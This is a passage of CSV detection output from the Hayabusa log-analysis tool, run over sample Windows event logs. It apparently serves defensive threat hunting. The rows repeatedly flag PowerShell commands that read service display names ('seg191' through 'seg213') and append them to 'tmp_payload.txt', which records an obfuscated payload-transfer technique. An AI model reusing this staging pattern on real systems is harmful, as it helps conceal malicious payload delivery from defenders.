0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x474 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:05.256 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg191"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xabc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:06.713 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:06.728 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg192"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x61c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:08.194 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg193"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:09.644 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg194"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:11.108 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xed4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:11.124 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg195"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:12.598 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg196"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:14.049 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:14.065 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg197"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:15.496 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:15.511 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg198"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:16.954 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg199"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:18.401 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg200"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6fc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:19.854 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:19.869 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg201"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:21.305 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg202"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xec0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:22.769 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg203"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x32c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:24.239 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg204"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x42c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:25.692 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1c8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:25.708 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg205"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:27.141 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x78c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:27.157 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg206"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:28.605 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg207"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:30.058 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:30.074 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg208"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x704 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x20c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:31.535 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg209"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:32.988 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg210"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:34.429 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg211"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:35.880 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:35.896 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg212"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:39:37.347 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 